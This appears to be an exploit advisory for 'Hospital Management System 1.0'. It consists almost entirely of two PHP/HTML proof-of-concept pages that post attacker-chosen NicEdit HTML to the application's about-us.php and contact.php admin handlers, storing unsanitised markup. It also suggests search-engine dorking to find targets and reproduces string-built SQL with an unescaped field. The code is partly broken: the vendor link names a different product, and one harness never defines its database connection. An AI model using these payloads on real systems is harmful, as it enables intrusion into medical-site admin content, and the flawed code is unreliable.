## https://sploitus.com/exploit?id=PACKETSTORM:180246
=============================================================================================================================================  
| # Title : Hospital Management System 1.0 (WYSIWYG) code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engines.  
  
[+] Part 01 : about-us.php  
  
[+] This payload injects code of your choice into the database via NicEdit, a WYSIWYG editor (v0.9 r25) that is loaded inside the file /hms/admin/about-us.php.  
  
[+] Line 2 : Make sure to include your database connection here  
  
[+] Line 44 : Send the form data using the fetch API (set your target URL)  
  
[+] Save the payload as poc.php in your localhost path.  
  
[+] payload :   
  
<?php // PoC harness: a stand-alone copy of the target's about-us update handler, followed by a form that posts NicEdit HTML to that endpoint. Only the PHP comments are review notes; the HTML/JS below is emitted as-is.  
include('http://127.0.0.1/hospital/hms/admin/include/config.php'); // Make sure to include your database connection here — NOTE(review): a URL include pulls what the remote server emits, not the file's source; $con is presumably expected to be defined by it — confirm  
  
if (isset($_POST['submit'])) { // Handler path: appears to mirror the application's update logic for PageType='aboutus'  
$pagetitle = $_POST['pagetitle']; // Interpolated into the SQL below without escaping (unlike $pagedes); a prepared statement is the application-side fix  
$pagedes = $con->real_escape_string($_POST['pagedes']); // Escaped for SQL only: the raw editor HTML is stored unchanged, so any markup in it reaches whatever later renders PageDescription unless that side sanitises or encodes it  
$query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'"); // String-built SQL; parameterise (mysqli_prepare + bind_param) on the application side  
  
if ($query) { // mysqli_query returns false on failure  
echo '<script>alert("About Us has been updated.")</script>'; // Outcome is reported via an inline <script> alert  
} else {  
echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
}  
exit; // On a POST, stop here so the form HTML below is not emitted  
}  
?>  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>indoushka | Update About Us Content</title>  
<!-- NicEdit Script -->  
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
<script type="text/javascript">  
// Apply NicEdit to all text areas when the DOM is loaded  
bkLib.onDomLoaded(nicEditors.allTextAreas);  
  
// Function to handle form submission using JavaScript  
function submitForm(event) {  
event.preventDefault(); // Prevent default form submission  
  
const pagetitle = document.getElementById('pagetitle').value;  
const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content  
  
// Prepare the form data to be sent  
const formData = new FormData();  
formData.append('pagetitle', pagetitle);  
formData.append('pagedes', pagedes);  
formData.append('submit', true);  
  
// Send the form data using fetch API  
fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {  
method: 'POST',  
body: formData,  
})  
.then(response => response.text())  
.then(data => {  
alert('About Us content has been updated successfully.');  
console.log(data); // Handle the response from the server  
})  
.catch(error => {  
console.error('Error:', error);  
});  
}  
</script>  
<style>  
/* Center the form container */  
.editor-container {  
max-width: 800px;  
margin: 0 auto; /* Center horizontally */  
padding: 20px;  
text-align: center; /* Center the content inside */  
}  
  
/* Ensure the textarea takes the full width */  
#pagedes {  
width: 100%;  
height: 300px;  
margin: 0 auto;  
}  
</style>  
</head>  
<body>  
<div id="app">  
<div class="app-content">  
<div class="main-content">  
<div class="wrap-content container" id="container">  
<!-- Page Title Section -->  
<section id="page-title">  
<div class="row">  
<div class="col-sm-8">  
<h1 class="mainTitle">Update the About Us Content</h1>  
</div>  
  
</li>  
</ol>  
</div>  
</section>  
<!-- Form Section -->  
<div class="container-fluid container-fullw bg-white">  
<div class="row">  
<div class="col-md-12">  
<!-- Centering the form using a wrapper div -->  
<div class="editor-container">  
<form class="forms-sample" method="post" onsubmit="submitForm(event);">  
<div class="form-group">  
<label for="pagetitle">Page Title</label>  
<input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
</div>  
<div class="form-group">  
<label for="pagedes">Page Description</label>  
<!-- NicEdit will enhance this textarea -->  
<textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
</div>  
<button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
</form>  
</div>  
</div>  
</div>  
</div>  
<!-- End Form Section -->  
</div>  
</div>  
</div>  
</div>  
<!-- Footer -->  
</body>  
</html>  
  
---------------------- [+] Part 02 : contact.php [+] --------------------  
  
[+] Line 4 : Make sure to include your database connection here  
  
[+] Line 60 : Send the form data using the fetch API (set your target URL)  
  
[+] Save the payload as poc.php in your localhost path.  
  
[+] payload :   
  
<?php // PoC harness for the contact-us handler: echoes the target's config script response, then serves a form that posts NicEdit HTML, e-mail and phone to contact.php. Only the PHP comments are review notes; the HTML/JS below is emitted as-is.  
  
// Address of the external server  
$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';  
  
// Fetch the data from the external server — NOTE(review): this returns the script's HTTP response as text; nothing in it is executed, so $con (used further down) is not defined by this step — confirm  
$response = file_get_contents($url);  
  
// Check that data was returned (file_get_contents yields false on failure)  
if ($response !== FALSE) {  
// Handle the data: it is echoed verbatim  
echo $response;  
} else {  
echo 'حدث خطأ أثناء جلب البيانات.';  
}  
  
if (isset($_POST['submit'])) { // Handler path: appears to mirror the application's update logic for PageType='contactus'  
$pagetitle = $_POST['pagetitle']; // Interpolated into the SQL below without escaping, unlike the three escaped fields  
$pagedes = $con->real_escape_string($_POST['pagedes']); // $con is not assigned anywhere in this file (see note above). Escaping here is for SQL only: the raw editor HTML is stored unchanged  
$email = $con->real_escape_string($_POST['email']);  
$mobnum = $con->real_escape_string($_POST['mobnum']);  
  
$query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'"); // String-built SQL; a prepared statement with bound parameters is the application-side fix  
  
if ($query) { // mysqli_query returns false on failure  
echo '<script>alert("Contact Us has been updated.")</script>'; // Outcome is reported via an inline <script> alert  
} else {  
echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
}  
exit; // On a POST, stop here so the form HTML below is not emitted  
}  
  
?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Admin | Update Contact Us Content</title>  
<!-- NicEdit Script -->  
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
<script type="text/javascript">  
bkLib.onDomLoaded(nicEditors.allTextAreas);  
  
function submitForm(event) {  
event.preventDefault();  
  
const pagetitle = document.getElementById('pagetitle').value;  
const pagedes = nicEditors.findEditor('pagedes').getContent();  
const email = document.getElementById('email').value;  
const mobnum = document.getElementById('mobnum').value;  
  
const formData = new FormData();  
formData.append('pagetitle', pagetitle);  
formData.append('pagedes', pagedes);  
formData.append('email', email);  
formData.append('mobnum', mobnum);  
formData.append('submit', true);  
  
fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {  
method: 'POST',  
body: formData,  
})  
.then(response => response.text())  
.then(data => {  
alert('Contact Us content has been updated successfully.');  
console.log(data);  
})  
.catch(error => {  
console.error('Error:', error);  
});  
}  
</script>  
<style>  
.editor-container {  
max-width: 800px;  
margin: 0 auto;  
padding: 20px;  
text-align: center;  
}  
  
#pagedes {  
width: 100%;  
height: 300px;  
margin: 0 auto;  
}  
</style>  
</head>  
<body>  
<div id="app">  
<div class="app-content">  
<div class="main-content">  
<div class="wrap-content container" id="container">  
<section id="page-title">  
<div class="row">  
<div class="col-sm-8">  
<h1 class="mainTitle">Admin | Update Contact Us Content</h1>  
</div>  
<ol class="breadcrumb">  
<li class="active">  
<span>Update Contact Us Content</span>  
</li>  
</ol>  
</div>  
</section>  
<div class="container-fluid container-fullw bg-white">  
<div class="row">  
<div class="col-md-12">  
<div class="editor-container">  
<form class="forms-sample" method="post" onsubmit="submitForm(event);">  
<div class="form-group">  
<label for="pagetitle">Page Title</label>  
<input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
</div>  
<div class="form-group">  
<label for="pagedes">Page Description</label>  
<textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
</div>  
<div class="form-group">  
<label for="email">Email</label>  
<input id="email" name="email" type="email" class="form-control" required>  
</div>  
<div class="form-group">  
<label for="mobnum">Mobile Number</label>  
<input id="mobnum" name="mobnum" type="text" class="form-control" required>  
</div>  
<button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
</form>  
</div>  
</div>  
</div>  
</div>  
</div>  
</div>  
</div>  
</div>  
</body>  
</html>  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================